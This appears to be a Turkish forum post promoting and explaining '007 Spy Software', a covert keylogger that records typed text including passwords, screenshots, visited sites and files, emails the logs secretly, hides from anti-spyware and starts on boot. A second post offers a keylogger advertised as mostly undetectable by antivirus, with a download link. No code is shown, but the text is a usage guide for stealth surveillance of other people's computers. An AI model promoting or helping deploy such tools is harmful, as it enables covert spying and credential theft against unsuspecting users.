Programın Genel Özellikleri:
1.Klavye kaydedici özelliği ile bilgisayarda yazılan bütün herşeyi kaydeder. Örnegin; Msn sohbeti, açılan e-mailler, word dosyaları gibi.
2.İnternette girilen ve gezilen bütün web sitelerini ekran görüntüsü ile beraber kaydeder ve listeleyerek size gönderir.
3.Sizin belirleyeceğiniz aralıklarla bilgisayarın ekranının görüntüsünü alır ve kaydeder.
4.Bilgisayarınız da açılan veya çalıştırılan bütün komutları, dosyaları kaydeder ve listeler.
5.Bilgisayarınız da açılan veya silinen bütün dosyaları kaydeder ve listeler.
6.Bütün bu bilgileri sizin belirleyeceğiniz aralıklarla e-mail adresinize gizlice gönderir.
* Tamamen gizlidir.
* Casus yazılım tarayıcı ve benzeri programlar tarafından farkedilemez.
* Bilgisayar açılınca kendiliğinden otomatik olarak ve gizlice kaydetmeye başlar.
* Programa sadece sizin belirleyeceğiniz şifre ve kısayol tuşu ile gizlice ulaşılabilir.
* Programa girmek için Ctrl - Alt - F7 tuşlarına aynı anda basmalısınız. Programa girince ilk önce şifrenizi belirleyin , sonra e-mail adresinizi girebilirsiniz, böylece bilgisayarınızdan uzaktayken de neler olup bittiğini ögrenebilirsiniz. Ayrıca ekran kaydetme aralığını belirleyin.
* Masa üstünde kayıtlı olan '' 007 Install '' dosyasını silin, çünkü böylece yazılımın daha da gizli olması sağlanır.
* Program birçok kişinin kullandığı bilgisayarlara yüklenerek daha da çok bilgi ele geçirilebilir, fakat bizim temennimiz programın daha çok legal olarak kullanılması yönünde.
Programın dili İngilizce olmasına rağmen kullanımı son derece kolaydır. Çünkü; siz sadece mail adresinizi giriyorsunuz, gerekli olan bilgileri program kendiliğinden otomatikmen gönderiyor, yinede istediğiniz bilgileri kendiniz ayarlamak isterseniz; aşağıda belirttiğimiz terimler ve karşılıkları ile programı kendinize özgün olarak kullanabilirsiniz;
KEYSTROKES LOG : Klavye kaydedici. Bu butonu tıklayarak yazılan sohbetleri,mailleri ve şifreleri görebilirsiniz.
WEBSITES LOG : Bu butonu tıklayarak gezilen web sitelerinin listesini görebilirsiniz.
APPLICATIONS LOG : Bu butonu tıklayarak uygulamaların listesini görebilirsiniz.
SCREENSHOTS LOG : Bu butonu tıklayarak ekran fotoğraflarını görebilirsiniz.
FILE/FOLDERS LOG : Bu butonu tıklayarak açılan, silinen dosyaları görebilirsiniz.
PASSWORD SETUP : Programa girmek için kullanacağınız şifreyi belirleyin.
-Şifreyi belirleyebilmek için '' enable password protection to a**** unauthorised accses '' kutusunu işaretleyin.
HOTKEY SELECTION : Programı görünür yapmak için basmanız gereken tuşları belirlerleyebilirsiniz.
OVERRIDE ANTISPY PROGRAMES : Burayı işaretleyerek anti spy taramalarını atlatabilir, programın anti-virüslere karşı tanınmasını engelleyebilirsiniz.
START UP OPTION : Başlatma seçenekleri. Buradaki bütün kutuları işaretleyin.
ADVANCED OPTION : Gelişmiş seçenekler. Burayı tıklayarak bilgilerin gönderilmesini istediğiniz e-mail adresini belirleyin.
STEALTH MODE : Gizli mod. Programın başkaları tarafından farkedilmemesi için her zaman gizli mod da tutun.
CLEAR LOGS : Kaydedilen tüm içeriği siler.
HIDE : Programı gizler.
STOP : Programı durdurur.
UNINSTALL 007 SPY SOFTWARE : Programı bilgisayardan kaldırır.
CANCEL : Bu sayfada yapılan işlemleri iptal eder.
OK : Bu sayfada yapılan işlemleri kaydeder.
!!! Programı bilgisayarından kaldıramayan kullanıcılar için "uninstall" (kaldırma) açıklaması:
Öncelikle programın çalışır durumda olması gerekiyor. Belirlenen kısayol ile programın arayüzüne ulaşıyoruz ve ardından "Advanced Option" bölümüne girip "Uninstall 007 Spy Software" buttonuna basarak karşımıza çıkan onay sekmesinde "Evet" diyerek kaldırma işlemini tamamlıyoruz.
http://adf.ly/7RZm4
Easy Logger 1
kendi yazdığım grafikleri ve grafikleri çok basit bir programı paylaşmak istiyorum.
-%10 Fudsuz %90 Fudludur
-Loglar sağlam sayılır.
Resim:http://g1206.hizliresim.com/y/s/8nnqx.jpg
Link:Dosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Virüs:Scan Result | Element Scanner
Versiyon 2 de daha özellikli bir program yapacağım ins
